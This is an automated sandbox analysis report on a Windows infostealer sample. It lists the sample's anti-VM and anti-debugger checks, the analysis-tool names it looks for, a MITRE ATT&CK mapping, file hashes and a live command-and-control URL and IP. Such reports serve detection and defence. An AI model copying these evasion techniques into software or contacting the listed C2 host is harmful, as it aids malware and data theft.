Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Special instruction interceptor: First address: 1158741 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Special instruction interceptor: First address: F8DA51 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Special instruction interceptor: First address: 11BE66E instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Code function: 0_2_00B59980 rdtsc

0_2_00B59980

Source: C:\Users\user\Desktop\EMasovlyrQ.exe TID: 1812

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_0097255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,		0_2_0097255D
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,		0_2_009729FF

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Code function: 0_2_0097255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_0097255D

Source: EMasovlyrQ.exe, EMasovlyrQ.exe, 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EMasovlyrQ.exe, 00000000.00000003.2192228168.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000003.2192707964.0000000001C04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: EMasovlyrQ.exe	Binary or memory string: Hyper-V RAW
Source: EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: EMasovlyrQ.exe, 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: EMasovlyrQ.exe, 00000000.00000003.2249729977.0000000001C66000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000003.2249445122.0000000001C54000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000002.2256899743.0000000001C67000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000003.2249545943.0000000001C61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	File opened: NTICE
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	File opened: SICE
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Code function: 0_2_00B59980 rdtsc

0_2_00B59980

Source: EMasovlyrQ.exe, EMasovlyrQ.exe, 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: ?Program Manager

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49721 -> 147.45.113.159:80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	24 Virtualization/Sandbox Evasion	OS Credential Dumping	751 Security Software Discovery	1 Exploitation of Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	13 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	216 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
EMasovlyrQ.exe	52%	ReversingLabs	Win32.Infostealer.Tinba
EMasovlyrQ.exe	100%	Avira	TR/Crypt.TPM.Gen
EMasovlyrQ.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.twentytk20pn.top	147.45.113.159	true	false		high
httpbin.org	98.85.100.80	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322	false		high
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://curl.se/docs/hsts.html	EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	false	high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322se	EMasovlyrQ.exe, 00000000.00000003.2250038040.0000000001BF2000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000003.2250500496.0000000001BF7000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000002.2256563870.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://html4/loose.dtd	EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	false	high
https://curl.se/docs/alt-svc.html#	EMasovlyrQ.exe	false	high
https://httpbin.org/ipbefore	EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	false	high
https://curl.se/docs/http-cookies.html	EMasovlyrQ.exe, EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	false	high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=	EMasovlyrQ.exe, EMasovlyrQ.exe, 00000000.00000003.2249729977.0000000001C66000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000003.2249445122.0000000001C54000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000002.2256899743.0000000001C67000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000003.2249545943.0000000001C61000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://curl.se/docs/hsts.html#	EMasovlyrQ.exe	false	high
https://curl.se/docs/http-cookies.html#	EMasovlyrQ.exe	false	high
https://curl.se/docs/alt-svc.html	EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	false	high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322	EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	false	high
http://.css	EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	false	high
http://.jpg	EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	false	high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF	EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
98.85.100.80	httpbin.org	United States		11351	TWC-11351-NORTHEASTUS	false
147.45.113.159	home.twentytk20pn.top	Russian Federation		2895	FREE-NET-ASFREEnetEU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578943
Start date and time:	2024-12-20 16:55:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EMasovlyrQ.exe renamed because original name is a hash value
Original Sample Name:	04869f7ace61605035664af9589af21b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 40.126.53.7, 13.107.246.63
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: EMasovlyrQ.exe

Simulations

Behavior and APIs

Time	Type	Description
10:56:57	API Interceptor	3x Sleep call for process: EMasovlyrQ.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
98.85.100.80	h9CywWZk71.exe	Get hash	malicious	Cryptbot	Browse
	icDcFzyHRy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	5ZH9uXmzGP.exe	Get hash	malicious	Unknown	Browse
	u16wYpJpGE.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	HZhObFuFNe.exe	Get hash	malicious	Unknown	Browse
	t6VDbnvGeN.exe	Get hash	malicious	Unknown	Browse
	CMpuGis28l.exe	Get hash	malicious	Unknown	Browse
	u57m8aCdwb.exe	Get hash	malicious	Unknown	Browse
	TnIhoWAr57.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse
147.45.113.159	oJkvQZYkrx.exe	Get hash	malicious	Unknown	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	f9bcOz8SxR.exe	Get hash	malicious	Unknown	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	u16wYpJpGE.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	1o81tDUu5M.exe	Get hash	malicious	Unknown	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	twentytk20pn.top/v1/upload.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=2Rb3R6cTcShMDFLr1734664370
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	twentytk20pn.top/v1/upload.php
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=aMcIUlaEFPceCafP1734635514
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	twentytk20pn.top/v1/upload.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
home.twentytk20pn.top	oJkvQZYkrx.exe	Get hash	malicious	Unknown	Browse	147.45.113.159
	f9bcOz8SxR.exe	Get hash	malicious	Unknown	Browse	147.45.113.159
	u16wYpJpGE.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	147.45.113.159
	1o81tDUu5M.exe	Get hash	malicious	Unknown	Browse	147.45.113.159
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	147.45.113.159
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	147.45.113.159
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	147.45.113.159
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	147.45.113.159
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	147.45.113.159
	SwJD3kiOwV.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	194.87.47.113
httpbin.org	h9CywWZk71.exe	Get hash	malicious	Cryptbot	Browse	98.85.100.80
	oJkvQZYkrx.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	icDcFzyHRy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	5ZH9uXmzGP.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	2M43DSi2cx.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	f9bcOz8SxR.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	u16wYpJpGE.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	1o81tDUu5M.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	HZhObFuFNe.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	t6VDbnvGeN.exe	Get hash	malicious	Unknown	Browse	98.85.100.80

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TWC-11351-NORTHEASTUS	h9CywWZk71.exe	Get hash	malicious	Cryptbot	Browse	98.85.100.80
	icDcFzyHRy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	5ZH9uXmzGP.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	u16wYpJpGE.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	HZhObFuFNe.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	t6VDbnvGeN.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	CMpuGis28l.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	u57m8aCdwb.exe	Get hash	malicious	Unknown	Browse	98.85.100.80
	TnIhoWAr57.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	arm5.elf	Get hash	malicious	Mirai	Browse	72.226.210.219
FREE-NET-ASFREEnetEU	oJkvQZYkrx.exe	Get hash	malicious	Unknown	Browse	147.45.113.159
	f9bcOz8SxR.exe	Get hash	malicious	Unknown	Browse	147.45.113.159
	u16wYpJpGE.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	147.45.113.159
	1o81tDUu5M.exe	Get hash	malicious	Unknown	Browse	147.45.113.159
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	147.45.113.159
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	147.45.113.159
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	147.45.113.159
	https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6i	Get hash	malicious	HTMLPhisher	Browse	147.45.179.98
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	147.45.113.159

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.985385064824602
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	EMasovlyrQ.exe
File size:	4'460'032 bytes
MD5:	04869f7ace61605035664af9589af21b
SHA1:	0688d7e4038f6103600011198edecb98df152221
SHA256:	957a5b78c870c0c648884b8ee30f5f437325c94212f4436566cccbc3b88aa987
SHA512:	c78f3877d5adb2847471b300d259b8875a8ba50a9fa1a1c3981c2a3316c8b5131e9d72d0e503557c14b4fd30a78b8d34c810aade2ec6bda4729daf7fc2f8ccae
SSDEEP:	98304:uOsbw/GM4JTpF/dHkl1J000ReHSmC3J8qP/vbyN/I5i/H8CCW:1KGKJTpldHkl2mCbP/vbiN7C
TLSH:	2A2633017CA11124C96B06B211EF22D8CD4E2E66B15B04D9BF95ADB2FEC3F38135D99E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@...................................E...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xf5e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F7C48B52FEAh
paddsb mm0, qword ptr [ebx+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F7C48B54FE5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi+03h], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jnle 00007F7C48B52F62h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov byte ptr [ecx], 00000000h
add byte ptr [esi], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61905f	0x73	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x618000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb5be60	0x10	yxuskcgf
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb5be10	0x18	yxuskcgf
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x617000	0x283e00	cdbc521fa508ca6fbd2a16617de5f035	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x618000	0x2b0	0x200	398152db3db3e99f5ab97b1e3db11d8e	False	0.80078125	data	5.992643297991356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x619000	0x1000	0x200	e8fbf92e0939d0cd4935f0fe539e974d	False	0.166015625	data	1.1763897754724144	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x61a000	0x389000	0x200	51dea0142fdf5ad388282873d6fa90cc	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yxuskcgf	0x9a3000	0x1ba000	0x1b9200	65918e8330e3c0038d84f169c1db3f1c	False	0.994499260590819	data	7.955898878885769	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pwerqsbo	0xb5d000	0x1000	0x600	fcb2911440b86f2bfdf11cbeff4a7981	False	0.583984375	data	5.049793887560696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
